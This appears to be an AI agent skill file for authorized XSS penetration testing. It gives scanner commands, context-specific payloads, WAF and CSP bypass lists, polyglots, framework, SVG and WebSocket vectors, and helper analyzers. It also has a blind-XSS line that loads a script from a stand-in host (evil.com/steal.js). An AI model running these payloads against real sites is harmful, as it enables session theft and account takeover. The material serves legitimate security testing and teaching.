exploit-xss

Cross-Site Scripting (XSS) Detection Skill


⚠️ DANGER - Authorization Required


This skill is for AUTHORIZED SECURITY TESTING ONLY.
You must have:
  • Written permission from the target system owner
  • Legal authorization to test the target
  • A defined scope of testing
Unauthorized XSS testing is ILLEGAL and unethical.


Prerequisites


Required Tools


```bash
# XSStrike - Advanced XSS scanner with DOM support
pip install xsstrike

# Dalfox - Fast XSS scanner with pipeline mode
go install github.com/hahwul/dalfox/v2@latest

# XSpear - XSS testing with WAF bypass
gem install xspear
```

Python Requirements


```bash
# Install required Python packages for built-in scripts
pip install requests beautifulsoup4

# Optional: WebSocket XSS testing
pip install websockets
```

Optional Tools


```bash
# Burp Suite for manual testing
# OWASP ZAP for automated scanning
```

---

Quick Start


Basic URL Testing


```bash
# Test a URL parameter for XSS
python xsstrike.py -u "https://target.com/search?q=test"

# Fast scanning with Dalfox
```

POST Request Testing


```bash
# Save POST request to file
dalfox file request.txt

# Or use XSStrike
python xsstrike.py -r request.txt
```

DOM XSS Testing


```bash
# DOM XSS with XSStrike
python xsstrike.py -u "https://target.com/page#test" --dom

# DOM XSS with Dalfox
dalfox url "https://target.com/page#test" --dom
```

---

Common Scenarios


1. Basic Parameter Testing (Reflected XSS)


Test URL parameters for reflection and injection:

```bash
# Single URL testing
python xsstrike.py -u "https://target.com/search?q=test"

# Dalfox for faster scanning
# Specify parameter
dalfox url "https://target.com/search" -p q
```

**What to check:**
- Does the input reflect in the HTML response?
- What is the context (HTML tag, attribute, JavaScript)?
- Are there any filters/encoding applied?

2. POST Request XSS (Form Testing)


Test POST forms for stored/reflected XSS:

```bash
# Save request to file first (one header per line, blank line before the body)
echo 'POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=test&password=test' > post_request.txt

# Test with XSStrike
python xsstrike.py -r post_request.txt

# Test with Dalfox
dalfox file post_request.txt
```

**Common POST targets:**
- Login forms (username, email fields)
- Contact forms (name, message fields)
- Search forms
- Comment forms
- User profile updates

3. Cookie and Header XSS


Test HTTP headers and cookies for injection:

```bash
# Test with custom cookies
python xsstrike.py -u "https://target.com" --cookie "session=test&user=<script>alert(1)</script>"

# Test User-Agent header
python xsstrike.py -u "https://target.com" --user-agent "<script>alert(1)</script>"

# Test Referer header (often reflects in error pages)
python xsstrike.py -u "https://target.com" --referer "https://evil.com/<script>alert(1)</script>"
```

**Headers to test:**
- User-Agent (check application logs/error pages)
- Referer (check 404 pages, analytics)
- X-Forwarded-For (check IP reflection)
- Cookie (check welcome messages/logs)

4. Reflected XSS Detection


Identify reflection points and test payloads:

```bash
# Automated reflection detection
dalfox url "https://target.com/search?q=test" --only-discovery

# Manual reflection analysis
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

# Differential response analysis
python xsstrike.py -u "https://target.com/search?q=test" --blind
```

**Detection techniques:**
- Compare response length with/without payload
- Search for payload in response HTML
- Check for encoding/filtering patterns
- Identify HTML context (tag, attribute, JS, CSS)
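The two manual checks above (where does the input land, and what happened to each special character on the way) can be answered offline from a saved response body. This is an added example written for this page, not the skill's own `scripts/xss_context_analyzer.py`; the marker token, canary string and the three sample responses are constructed, and it relies only on the standard-library HTML parser.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import quote

MARKER = "zq7x1"                  # alphanumeric token that survives most filters
CANARY = '<>"\'/'                 # characters whose fate reveals the filtering
PROBE = MARKER + CANARY + MARKER  # value that would be supplied in the parameter


class ReflectionLocator(HTMLParser):
    """Record each place MARKER is echoed and the syntactic context it lands in."""

    def __init__(self, marker):
        super().__init__()        # convert_charrefs=True: text between tags arrives whole
        self.marker = marker
        self.hits = []            # (context, snippet)
        self._raw_tag = None      # "script" or "style" while inside one

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._raw_tag = tag
        for name, value in attrs:
            if value is not None and self.marker in value:
                ctx = "event-handler attribute" if name.startswith("on") else "attribute value"
                self.hits.append((ctx, f"<{tag} {name}>"))
            elif self.marker in name:
                self.hits.append(("attribute name", f"<{tag} {name}>"))

    def handle_endtag(self, tag):
        if tag == self._raw_tag:
            self._raw_tag = None

    def handle_data(self, data):
        if self.marker in data:
            ctx = {"script": "javascript", "style": "css"}.get(self._raw_tag, "html body")
            self.hits.append((ctx, data.strip()[:60]))

    def handle_comment(self, data):
        if self.marker in data:
            self.hits.append(("html comment", data.strip()[:60]))


def encoding_report(body, marker=MARKER, canary=CANARY):
    """Classify how each canary character came back between the two marker copies."""
    m = re.search(re.escape(marker) + r"(.*?)" + re.escape(marker), body, re.S)
    if not m:
        return {}
    echoed = m.group(1)
    report = {}
    for ch in canary:
        if "\\" + ch in echoed:
            report[ch] = "backslash-escaped"      # typical of a JavaScript string context
        elif ch in echoed:
            report[ch] = "raw"                    # reached the page untouched
        elif html.escape(ch, quote=True) in echoed or (ch == "'" and "&#39;" in echoed):
            report[ch] = "html-encoded"
        elif quote(ch, safe="") in echoed:
            report[ch] = "url-encoded"
        else:
            report[ch] = "stripped"
    return report


def analyze(body, marker=MARKER):
    """Return ([contexts], {canary char: treatment}) for one response body."""
    locator = ReflectionLocator(marker)
    locator.feed(body)
    locator.close()
    return [ctx for ctx, _ in locator.hits], encoding_report(body, marker)


# Constructed sample responses, one per reflection context; not from any real site.
SAMPLES = {
    "search_result": "<p>You searched for: zq7x1&lt;&gt;&quot;&#x27;/zq7x1</p>",
    "form_field": "<input type=\"text\" name=\"q\" value=\"zq7x1&lt;&gt;&quot;'/zq7x1\">",
    "inline_script": "<script>var q = \"zq7x1<>\\\"'/zq7x1\";</script>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        contexts, treatment = analyze(body)
        print(f"{name}: context={contexts} treatment={treatment}")
```

The third sample shows why context matters: every character is HTML-safe inside the script block, yet `<` and `/` come back raw, so the JavaScript string is only as safe as the server's handling of a closing `</script>` sequence.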

5. Stored XSS Testing (Database Persistence)


Test for XSS that persists in the database:

```bash
# Test comment/feedback forms
dalfox file post_request.txt --blind https://your-callback.burpcollaborator.net

# Test user profile fields
python xsstrike.py -r profile_update_request.txt

# Time-based detection for stored XSS
scripts/blind_xss_tester.py --url "https://target.com/contact" --form-data "name=test&email=test@test.com&message=payload"
```

**Stored XSS targets:**
- User profiles (name, bio, location)
- Comments/Reviews
- Forum posts
- Email/contact forms (admin panel XSS)
- File upload metadata

6. DOM XSS Discovery


Find client-side XSS vulnerabilities:

```bash
# DOM XSS scanning
python xsstrike.py -u "https://target.com/page#input" --dom

# Dalfox DOM mode

# Manual DOM source analysis
scripts/xss_context_analyzer.py --dom "https://target.com/page"
```

**Common DOM sources:**
- `location.hash`
- `location.search`
- `document.cookie`
- `document.referrer`
- `window.name`

**Common DOM sinks:**
- `innerHTML`
- `document.write()`
- `eval()`
- `location.href`
- `setTimeout()` / `setInterval()`
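"Trace data flow to sinks" in the checklist later on is the manual version of the pass below: walk a script once, remember which variables were derived from one of the sources listed above, and report each statement that hands such a value to one of the sinks. This is an added example, not the skill's `--dom` analyzer; it extends the sink list with `outerHTML` and `insertAdjacentHTML`, treats one statement per line, and runs on a constructed sample script.

```python
import re

# Sources and sinks from the lists above; outerHTML and insertAdjacentHTML are added
# here as two further sinks of the same kind.
SOURCES = {
    "location.hash": r"\blocation\.hash\b",
    "location.search": r"\blocation\.search\b",
    "document.cookie": r"\bdocument\.cookie\b",
    "document.referrer": r"\bdocument\.referrer\b",
    "window.name": r"\bwindow\.name\b",
}
SINKS = {
    "innerHTML": r"\.innerHTML\s*=(?!=)",
    "outerHTML": r"\.outerHTML\s*=(?!=)",
    "document.write": r"\bdocument\.write(?:ln)?\s*\(",
    "eval": r"\beval\s*\(",
    "setTimeout/setInterval": r"\bset(?:Timeout|Interval)\s*\(",
    "location.href": r"\blocation\.href\s*=(?!=)",
    "insertAdjacentHTML": r"\.insertAdjacentHTML\s*\(",
}
# `const name = expr` (or let/var), or a bare `name = expr` reassignment
ASSIGN = re.compile(r"^\s*(?:(?:var|let|const)\s+)?([A-Za-z_]\w*)\s*=(?!=)\s*(.+)$")


def is_tainted(expr, tainted):
    """True if expr reads a DOM source or a variable already derived from one."""
    if any(re.search(p, expr) for p in SOURCES.values()):
        return True
    return any(re.search(rf"\b{re.escape(v)}\b", expr) for v in tainted)


def scan_js(source):
    """One forward pass over a script: propagate taint through simple assignments,
    then report every statement that passes a tainted value into a sink.
    Returns [(line_number, sink_name, statement)]."""
    tainted = set()
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = ASSIGN.match(line)
        if m:
            name, rhs = m.groups()
            if is_tainted(rhs, tainted):
                tainted.add(name)
            else:
                tainted.discard(name)   # overwritten with a clean value
        for sink, pattern in SINKS.items():
            if re.search(pattern, line) and is_tainted(line, tainted):
                findings.append((lineno, sink, line.strip()))
    return findings


# Constructed sample script (not taken from any real site). Lines 3, 5 and 9 should
# be reported; line 4 uses textContent, which is not a sink, and line 6 passes a
# constant string to setTimeout.
SAMPLE_JS = """\
const q = decodeURIComponent(location.hash.slice(1));
const label = q.toUpperCase();
document.getElementById('out').innerHTML = label;
document.getElementById('out').textContent = q;
eval(window.name);
setTimeout("refreshView()", 1000);
const token = document.cookie;
console.log(token.length);
location.href = label;
"""

if __name__ == "__main__":
    for lineno, sink, stmt in scan_js(SAMPLE_JS):
        print(f"line {lineno}: {sink} <- {stmt}")
```

Because the pass is line-based and regex-driven it misses taint that travels through function calls, object properties or multi-line expressions; it is a triage aid for deciding where to point the real DOM scanners, not a replacement for them.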

7. Blind XSS in Forms (Contact/Admin XSS)


Test XSS in forms that execute in admin panels:

```bash
# Generate blind XSS payloads with callback
scripts/xss_payload_generator.py --blind --callback "https://your-callback.com"

# Test contact form with blind payload
dalfox file contact_request.txt --blind https://your-callback.burpcollaborator.net

# XSpear blind mode
xspear -u "https://target.com/contact" -d "name=test&message=<script src=https://evil.com/steal.js></script>"
```

**Blind XSS testing tips:**
- Use unique payloads per test (to identify which parameter is vulnerable)
- Use Burp Collaborator or interactsh for callbacks
- Test email contact forms (executes when admin opens email)
- Test support ticket systems

8. Context-Aware Payloads


Use payloads specific to the injection context:

```bash
# Analyze context first
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

# Generate context-specific payloads
scripts/xss_payload_generator.py --context html-attribute
scripts/xss_payload_generator.py --context javascript
scripts/xss_payload_generator.py --context url
```

**Context-specific payloads:**

**HTML Body/Tag:**
```html
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
```

**HTML Attribute:**
```html
" onmouseover=alert('XSS')
javascript:alert('XSS')
```

**JavaScript:**
```javascript
';alert('XSS');//
'-alert('XSS')-
</script><script>alert('XSS')</script>
```

**CSS/Style:**
```css
</style><script>alert('XSS')</script>
expression(alert('XSS'))
```

9. WAF Bypass Techniques


Evade Web Application Firewalls:

```bash
# Generate WAF bypass payloads
scripts/xss_payload_generator.py --waf-bypass

# Use XSpear with bypass mode

# Test various encodings
python xsstrike.py -u "https://target.com/search?q=test" --encode
```

**Bypass techniques:**
- URL encoding: `%3Cscript%3Ealert(1)%3C/script%3E`
- Double encoding: `%253Cscript%253E`
- Unicode encoding: `\u003Cscript\u003E`
- HTML entities: `&lt;script&gt;alert(1)&lt;/script&gt;`
- Case mixing: `<ScRiPt>alert(1)</sCrIpT>`
- Comment injection: `<script><!-- anything -->alert(1)</script>`
- Tab/newline injection: `<script\t>alert(1)</script>`

10. Automated Scanning (Batch Testing)


Scan multiple URLs/parameters:

```bash
# Scan from file
dalfox file urls.txt

# Pipe from other tools
cat urls.txt | dalfox pipe

# XSStrike with multiple targets (read line by line so URLs containing ? or * are not glob-expanded)
while IFS= read -r url; do python xsstrike.py -u "$url"; done < urls.txt

# Combine with subdomain enumeration
subfinder -d example.com -silent | httpx -silent | dalfox pipe
```

11. Payload Encoding Variations


Test with different encoding schemes:

```bash
# URL encode payloads
scripts/xss_payload_generator.py --encode url

# HTML encode
scripts/xss_payload_generator.py --encode html

# Hex encode
scripts/xss_payload_generator.py --encode hex

# Test with XSStrike encoding
python xsstrike.py -u "https://target.com" --encode
```

**Common encodings to test:**
1. Plain: `<script>alert(1)</script>`
2. URL encoded: `%3Cscript%3Ealert(1)%3C/script%3E`
3. Double URL encoded: `%253Cscript%253E`
4. HTML entities: `&lt;script&gt;alert(1)&lt;/script&gt;`
5. Hex: `\x3Cscript\x3Ealert(1)\x3C/script\x3E`
6. Unicode: `\u003Cscript\u003Ealert(1)\u003C/script\u003E`

12. Polyglot Payloads


Test with payloads that work in multiple contexts:

```bash
# Generate polyglot payloads
scripts/xss_payload_generator.py --polyglot

# Common polyglot payload
# Works in: HTML, HTML attribute, JavaScript string, etc.
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A
```

**Famous polyglot payloads:**

```javascript
// Ashar Javed's polyglot
%3Cscript%3Ealert(1)%3C/script%3E

// Mathias Karlsson's polyglot
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

// Another polyglot
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
```

13. CSP Detection and Bypass


Content Security Policy analysis and bypass testing:

```bash
# Detect and analyze CSP
python scripts/csp_detector.py https://target.com

# Generate bypass report
python scripts/csp_detector.py https://target.com --bypass

# Full CSP analysis
python scripts/csp_detector.py https://target.com --verbose
```

**Common CSP bypass techniques:**
- `unsafe-inline` - allows inline scripts
- `unsafe-eval` - allows eval(), setTimeout()
- `data:` URLs - inline scripts via data URI
- Wildcard sources - allows any domain
- Nonce-based bypasses
- Framework-specific bypasses

See `references/csp_bypass_guide.md` for detailed techniques.
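The first four weaknesses above can be read straight off the header once it is parsed the way a browser reads it: a repeated directive is ignored, and `script-src` inherits `default-src` when it is absent. This is an added example, not the skill's `scripts/csp_detector.py`; the sample policies are constructed, and the function reviews only the script directive.

```python
# Fetch directives that inherit default-src when they are not set themselves.
FETCH_DIRECTIVES = {"script-src", "style-src", "img-src", "connect-src",
                    "font-src", "media-src", "object-src", "frame-src"}
KEYED = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header):
    """Turn a Content-Security-Policy header into {directive: [sources]}.
    A repeated directive is ignored, as browsers do: the first occurrence wins."""
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy


def effective_sources(policy, directive):
    """Sources in force for a directive, honouring the default-src fallback.
    None means the directive is unrestricted."""
    if directive in policy:
        return policy[directive]
    if directive in FETCH_DIRECTIVES:
        return policy.get("default-src")
    return None


def review_script_policy(header):
    """Findings for the script-src that is actually in force (the weaknesses listed above)."""
    src = effective_sources(parse_csp(header), "script-src")
    if src is None:
        return ["no script-src and no default-src: inline, eval and any remote script are allowed"]
    findings = []
    keyed = any(s.startswith(KEYED) for s in src)
    if "'unsafe-inline'" in src and keyed:
        # CSP Level 2 browsers drop 'unsafe-inline' once a nonce or hash is present
        findings.append("'unsafe-inline' is present but ignored by CSP Level 2+ browsers "
                        "because a nonce/hash is set (legacy fallback only)")
    elif "'unsafe-inline'" in src:
        findings.append("'unsafe-inline': inline <script> blocks and on* handlers run, "
                        "so any injected markup executes")
    if "'unsafe-eval'" in src:
        findings.append("'unsafe-eval': eval() and string arguments to setTimeout()/setInterval() run")
    if "data:" in src:
        findings.append("data: permitted for scripts: a script can be supplied inline as a data: URI")
    for s in src:
        if s in ("*", "http:", "https:"):
            findings.append(f"wildcard source {s}: any host may serve scripts")
    return findings


# Constructed sample headers (not from any real site).
SAMPLE_POLICIES = {
    "weak": "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' data: https:; img-src *",
    "fallback": "default-src 'self' 'unsafe-inline'",
    "missing": "img-src 'self'; frame-ancestors 'none'",
    "strict": "default-src 'none'; script-src 'nonce-R4nd0mV4lu3' 'strict-dynamic'; "
              "object-src 'none'; base-uri 'none'",
}

if __name__ == "__main__":
    for name, header in SAMPLE_POLICIES.items():
        print(name)
        for finding in review_script_policy(header) or ["no script-src findings"]:
            print("  -", finding)
```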

14. Framework-Specific XSS


Test for Angular, React, Vue, and other framework vulnerabilities:

```bash
# Auto-detect frameworks
python scripts/framework_xss_tester.py --url https://target.com --detect

# Test Angular XSS
python scripts/framework_xss_tester.py --url https://target.com --param q --framework angular

# Test React XSS
python scripts/framework_xss_tester.py --url https://target.com --param data --framework react

# Test Vue XSS
python scripts/framework_xss_tester.py --url https://target.com --param content --framework vue
```

**Common framework vectors:**
- Angular: `{{constructor.constructor('alert(1)')()}}`
- React: `dangerouslySetInnerHTML`
- Vue: `v-html` directive
- jQuery: `.html()` manipulation

See `references/framework_xss_guide.md` for detailed techniques.

15. SVG File Upload XSS


Test for SVG-based XSS in file uploads:

```bash
# Generate SVG payloads
python scripts/svg_xss_tester.py --generate --variant file_upload

# Test SVG injection
python scripts/svg_xss_tester.py --url https://target.com --param content

# Test SVG file upload
python scripts/svg_xss_tester.py --upload-url https://target.com/upload --file-param avatar

# Create exploit SVG
python scripts/svg_xss_tester.py --save-svg exploit.svg --callback https://your-callback.com
```

**SVG XSS vectors:**
- `<svg onload="alert('XSS')">`
- `<svg><script>alert('XSS')</script></svg>`
- `<svg><foreignObject><iframe src="javascript:alert('XSS')"></iframe></foreignObject></svg>`

See `references/svg_xss_guide.md` for detailed techniques.

16. Mutation XSS (mXSS)


Test for HTML mutation-based XSS:

```bash
# Test all mutation types
python scripts/mutation_xss_tester.py --url https://target.com --param q --type all

# Test DOM clobbering
python scripts/mutation_xss_tester.py --url https://target.com --param q --dom-clobber

# Test attribute mutations
python scripts/mutation_xss_tester.py --url https://target.com --param q --attribute
```

**Mutation XSS vectors:**
- Entity decoding mutations: `&lt;` → `<`
- Tag parsing mutations: `<xmp>`, `<listing>`
- DOM clobbering: `<a id="location">`
- Namespace mutations: SVG/MathML

See `references/mutation_xss_guide.md` for detailed techniques.

17. WebSocket XSS


Test for XSS vulnerabilities in WebSocket connections:

```bash
# Scan URL for WebSocket endpoints
python scripts/websocket_xss_tester.py --url https://target.com

# Test specific WebSocket URL
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws

# Test DOM injection via WebSocket
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-dom

# Test stored XSS in WebSocket
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-stored

# Test with custom payload
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --payload '<script>alert(1)</script>'
```

**WebSocket XSS vectors:**
- Message reflection: `ws.send('<script>alert(1)</script>')`
- JSON injection: `{"message": "<img src=x onerror=alert(1)>"}`
- Event handler: `ws.send('alert(1);')`
- Attribute breaking: `" onmouseover=alert(1)`

See `references/websocket_xss_guide.md` for detailed techniques.

---

Tool Selection Guide


| Scenario | Recommended Tool | Command |
|---|---|---|
| Quick parameter testing | Dalfox | `dalfox url "https://target.com?param=test"` |
| Deep scanning with DOM | XSStrike | `python xsstrike.py -u "URL" --dom` |
| WAF bypass testing | XSpear | `xspear -u "URL" --bypass` |
| Stored/Blind XSS | Dalfox + Callback | `dalfox file req.txt --blind CALLBACK` |
| Manual testing | XSStrike | `python xsstrike.py -r request.txt` |
| Batch scanning | Dalfox pipe | `cat urls.txt \| dalfox pipe` |
| CSP Analysis | CSP Detector | `python scripts/csp_detector.py URL` |
| Framework XSS | Framework Tester | `python scripts/framework_xss_tester.py -u URL -p param` |
| SVG XSS | SVG Tester | `python scripts/svg_xss_tester.py -u URL -p param` |
| Mutation XSS | Mutation Tester | `python scripts/mutation_xss_tester.py -u URL -p param` |
| WebSocket XSS | WebSocket Tester | `python scripts/websocket_xss_tester.py -u URL` |
| Full Scan | Full Scanner | `python scripts/xss_full_scan.py -u URL --all` |

Tool Comparison:

| Feature | XSStrike | Dalfox | XSpear | Built-in Scripts |
|---|---|---|---|---|
| Speed | Medium | Fast | Medium | Varies |
| DOM XSS | Excellent | Good | Limited | Good |
| WAF Bypass | Good | Good | Excellent | Good |
| Pipeline Mode | No | Yes | No | No |
| Blind XSS | Yes | Yes | Yes | Yes |
| CSP Analysis | No | No | No | Yes |
| Framework Testing | No | No | No | Yes |
| SVG Testing | No | No | No | Yes |
| Mutation XSS | No | No | No | Yes |
| WebSocket XSS | No | No | No | Yes |

Testing Checklist


Reconnaissance Phase


  • Identify all input points (URL params, forms, headers, cookies)
  • Map out application functionality
  • Identify data storage locations

Reflected XSS Testing


  • Test all URL parameters
  • Test all form fields (GET/POST)
  • Test HTTP headers (UA, Referer, Cookie)
  • Identify reflection context
  • Test context-specific payloads

Stored XSS Testing


  • Test all form submissions
  • Test file upload metadata
  • Test user profile fields
  • Test comments/reviews
  • Verify persistence across sessions
  • Test execution in different user contexts

DOM XSS Testing


  • Identify all DOM sources
  • Trace data flow to sinks
  • Test hash-based injections
  • Test URL parameter-based injections
  • Test localStorage/sessionStorage

Advanced Testing


  • Test WAF bypass techniques
  • Test encoding variations
  • Test polyglot payloads
  • Perform blind XSS testing
  • Test for CSP bypasses
  • Test framework-specific XSS (Angular/React/Vue)
  • Test SVG file upload XSS
  • Test Mutation XSS (DOM clobbering)
  • Test HTTP response header injection
  • Test WebSocket XSS (if applicable)


Scenario: Persistent Storage of XSS Findings


When you need to persist XSS findings to the database:

```bash
# Manual entry after discovering XSS
python .claude/skills/exploit-xss/scripts/xss_storage.py \
  --host-ip 192.168.1.100 \
  --url "https://example.com/search?q=test" \
  --xss-type reflected \
  --payload "<script>alert(1)</script>" \
  --context html_body \
  --severity High \
  --subsystem "Web Application"
```

**Parameters:**
- `--host-ip` - Target host IP (required)
- `--url` - Vulnerable URL (required)
- `--xss-type` - XSS type: reflected, stored, or dom (required)
- `--payload` - Payload used (required)
- `--context` - XSS context: html_body, html_attribute, javascript, dom, url (default: html_body)
- `--severity` - Severity level (default: Medium)
- `--subsystem` - Subsystem name (optional)
- `--parameter` - Vulnerable parameter name
- `--title` - Vulnerability title (auto-generated if not specified)
- `--description` - Vulnerability description
- `--cvss-score` - CVSS score (0.0-10.0)

**Database location:** `./data/results.db`

**Related skills:** `results-storage` - Query data, generate reports

---

Resources


Scripts


  • scripts/xss_payload_generator.py
    - Generate XSS payloads for various contexts
  • scripts/xss_tester.py
    - Automated XSS testing framework
  • scripts/xss_context_analyzer.py
    - Analyze injection context
  • scripts/blind_xss_tester.py
    - Test stored/blind XSS
  • scripts/csp_detector.py
    - CSP analysis and bypass testing
  • scripts/svg_xss_tester.py
    - SVG file upload XSS testing
  • scripts/framework_xss_tester.py
    - Angular/React/Vue XSS testing
  • scripts/mutation_xss_tester.py
    - Mutation XSS/DOM clobbering testing
  • scripts/websocket_xss_tester.py
    - WebSocket XSS testing
  • scripts/mxss_detector.py
    - HTML parser mutation XSS detection
  • scripts/xss_full_scan.py
    - Integrated XSS testing automation

Reference Documentation


  • references/dalfox_guide.md
    - Dalfox complete guide
  • references/xsstrike_guide.md
    - XSStrike complete guide
  • references/xspear_guide.md
    - XSpear complete guide
  • references/xss_payload_techniques.md
    - XSS payload techniques
  • references/dom_xss_guide.md
    - DOM XSS testing guide
  • references/csp_bypass_guide.md
    - CSP bypass techniques
  • references/framework_xss_guide.md
    - Framework-specific XSS guide
  • references/svg_xss_guide.md
    - SVG XSS testing guide
  • references/mutation_xss_guide.md
    - Mutation XSS/DOM clobbering guide
  • references/websocket_xss_guide.md
    - WebSocket XSS testing guide

Assets/Wordlists


  • assets/common_xss_payloads.txt
    - Basic XSS payloads
  • assets/attribute_xss_payloads.txt
    - Attribute context payloads
  • assets/dom_xss_payloads.txt
    - DOM XSS payloads
  • assets/blind_xss_payloads.txt
    - Blind XSS with callbacks
  • assets/polyglot_xss_payloads.txt
    - Multi-context payloads
  • assets/waf_bypass_payloads.txt
    - WAF evasion payloads
  • assets/csp_bypass_payloads.txt
    - CSP bypass payloads
  • assets/framework_xss_payloads.txt
    - Angular/React/Vue payloads
  • assets/svg_xss_payloads.txt
    - SVG XSS payloads
  • assets/mutation_xss_payloads.txt
    - Mutation XSS payloads
  • assets/websocket_xss_payloads.txt
    - WebSocket XSS payloads

External Resources


Common Responses & Troubleshooting

"No XSS found"

  • Try different payload encodings
  • Test with DOM scanner enabled
  • Check if there's a WAF blocking
  • Test with blind XSS payloads
  • Verify the parameter actually reflects

"Payload is reflected but not executing"

  • Analyze the context using context analyzer
  • Use context-specific payloads
  • Check for CSP (Content Security Policy)
  • Check for input sanitization
  • Try alternative tags/event handlers

"403 / WAF blocked"

  • Use WAF bypass payloads
  • Try different encoding methods
  • Use XSpear with --bypass flag
  • Test with smaller payloads first
  • Try alternative injection points


Reporting Format


When reporting XSS vulnerabilities, include:

```
╔═══════════════════════════════════════════════════════╗
║              XSS Vulnerability Report                 ║
╠═══════════════════════════════════════════════════════╣
║ Target: https://target.com/search                     ║
║ Type: Reflected XSS                                   ║
║ Severity: High                                        ║
╚═══════════════════════════════════════════════════════╝

Vulnerable Parameter: q
Injection Context: HTML attribute (value)
Payload: " onmouseover=alert('XSS')

Proof of Concept:
https://target.com/search?q=%22%20onmouseover%3Dalert('XSS')

Impact:
- Execute arbitrary JavaScript in victim's browser
- Steal session cookies
- Perform actions on behalf of victim
- Deface website

Recommendations:
- Implement proper output encoding
- Use Content Security Policy (CSP)
- Validate and sanitize all input
- Use framework-provided escaping functions
```